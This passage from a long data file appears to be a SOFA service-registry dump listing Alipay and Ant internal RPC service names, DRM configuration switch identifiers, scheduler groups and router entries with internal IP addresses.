ng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirecenter.common.service.facade.api.CaptureQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.EventRecordDetailManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundBankContractService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.orderfront:name=com.alipay.orderfront.task.config.singlePartitionNumPerTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.tmlife.TmLifeAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.team.TeamTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.stepflow.engine.facade.StepFlowEngineAgentFacade:1.0:demo-example@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegeocoding.common.service.client.DistrictProQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.AutoTransferInAmountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finpwm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerTransSuspendTxCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.StageManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.topmsg.api.UserTopMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:mbridge_delegate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.standard.api.IndustrygwConfigurableInstAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.DailyCutSupportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bds.facade.require.BdsRequireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.227.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","pvsofaclient@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeval.common.service.facade.eventsafeguard.OeHaEventSafeguardDetectTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeval.common.service.facade.morpho.MorphoQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantUserBindingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.93.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.admin.ApplyAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.MemoryOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.TickFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rcsmart@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ClientCacheServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.mds.MdsDatasetFieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FinResultSumFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinlib.agg.engine.facade.FeatureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocommopt.com.service.facade.api2.SelfMarketingActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.0.249.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.client.qaZQueue29#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insautobff:name=com.alipay.rdsguard.drm.RdsGlobalSwitchDrmResource.globalSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-daisuketwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icdpcore.common.service.facade.api.AdSpaceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.MerchandiseOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.blackListForGrey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.holoxlib.core.sample.service.PictureCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_1200#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_depositCertCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finormweb.service.facade.RiskEventFlowInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.ModelQueryService:1.0:custview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.autooperate.MerchantExtPropertyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkede.fabricsrv.rest.DBConfigRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.findtprod:name=com.alipay.kmi.client.cache.refresher.certName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cdp.common.service.space.traffic.CreativeDispatchService:1.0:channel_operation_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.fintradecenter.FintradeInstSignContractQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.common.service.facade.api.query.SasCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iopenmng.service.facade.SgwCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoRemindRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.module.api.ModuleRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINPROMO_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:mps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.DownloadCheckFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.biz.service.impl.test.MessageTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:gfpayrcv@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.salary.UserBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.ProposalOrderStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExPubRateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.superapi.common.core.client.opnecore.OpenIdAdaptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-promodmp-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instasset.common.service.facade.partner.EcologicalPartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.core.PushCheckScheduleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FinFreezeLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.ha3.api.Ha3OperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfbrmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.61.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.facade.reachshop.ShopOperateInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pvsofaserver:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.spring.SpringSteadilyHighFacadeV2:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.CrowdManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundtrade.common.service.facade.api.FundConvertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsBasementMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.tiyubiz.facade.lottery.LotteryActivityDrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.stockassetcore.common.service.facade.api.RemindBackStageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.common.service.integration.drm.resource.DrmForSupportPresetPaytool.drmForMultiActRefundWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.autoDeductDiffHours,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_OVERSEAPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilechat.common.service.facade.api.ChatMessageV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.writeoff.WriteoffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.product.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.BCCampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsTaskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.giftprod.amy.service.facade.GiftServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-inspectcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minishopprod.common.service.facade.api.miniop.CrowdOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundbankcore.common.service.facade.FundBankNoTradeOutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.SocialContactInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.classification.ClassificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.biz.rpc.api.guess.GuessRoundRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.transfercenter.common.service.facade.api.TransferQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmBizRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.integration.bumng.BumngPsUserServiceClient:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.ChangeStampOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccontractprod.common.service.facade.admin.api.TemplateDynamicDataSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.rule.BizRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-41#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseAsyncCheckQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServiceConfigureQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_alphaq_consumer#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkinstportal.common.service.facade.channel.api.InstptChannelTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.fixedApplyFailConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.15.238.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.mobile.component.common.facade.amcs.ConfigPublishCallback:1.0:imobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.feecharge.common.service.facade.ChargeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm7014#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finbatch:name=com.alipay.finbatch.biz.service.drm.AppFailoverSwitchDRM.drmValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkmerchantsettle.common.service.facade.stmtdetailquery.api.StmtDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkqafactory.facade.VerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.biz.activity.internal.listener.activityBizEventProcessor.alsc.ActivityStatusEventProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-quotationcore-distribute-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.shakecode.PreShareRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.UserActivityInstanceFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.76.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.qrcode.AppQrRuleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gsmartcenter.common.service.facade.api.GscObjectGraphMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zcache.tbase.prodcoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.common.service.facade.testSDK.TestGraySDKRoute:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.recon.CfpOnlineDepositSupplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zfcertifycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:channelspweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.echox.drm.EchoxSpecialDrm.cleanMockCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.iacquirefrontTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.32.67.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ipromomng.common.service.facade.api.template.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.exriskcenter.common.service.facade.api.mng.TreeNodeRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_BANKPROD_COMMON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.certifycenter.service.facade.resource.CloudCertifyResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.gateway.TradeGatewayAdapterTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:admgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.d9721.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.UserRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilerelation.common.service.facade.SocialProfileCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipayplus.mobile.component.common.facade.msgcenter.NotifyMessageOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_5#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:amldataproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.IBusinessFlowEngineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbgotone.common.service.facade.SmsSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_WKPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.api.live.LiveMockApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.zcache.switcher.customerv2.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentProductTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.ISwitchZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IStreamStatLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insscenemarket.common.facade.InsMktPointFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_XINLINQI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.apacc.common.service.facade.module.ModuleEventFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.activity.ActivityCommonConfigService:1.0:activityCommonConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftms.facade.api.basic.OuterAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.adcenter.common.service.facade.drill.service.AdcFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.facade.sign.SignatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.ItemQueryFacade:1.0:itemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:zdatafront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.common.manage.facade.api.EmendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imif.improd.common.service.facade.MerchantImportApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.spi.ServiceProvider:1.0:kbassetspi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ServiceInvokeReportConfigSwitch.delaySeed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.thor.service.ThorApplyInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.158.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.mpoint.facade.MpointDetailQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcalbmng.facade.beidou.CashTransferRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILEAPPCOMMON#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.GlobalSwitcher.autoFailoverRule,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-findecision-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.142.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.transfercode.TransferCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:appinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.SidecarConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tss.notify.common.service.facade.SendMailCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybDefaultProdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zbdm.common.service.facade.BdmODPSTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.lifecustprod.common.service.facade.setting.SettingFacade:1.0@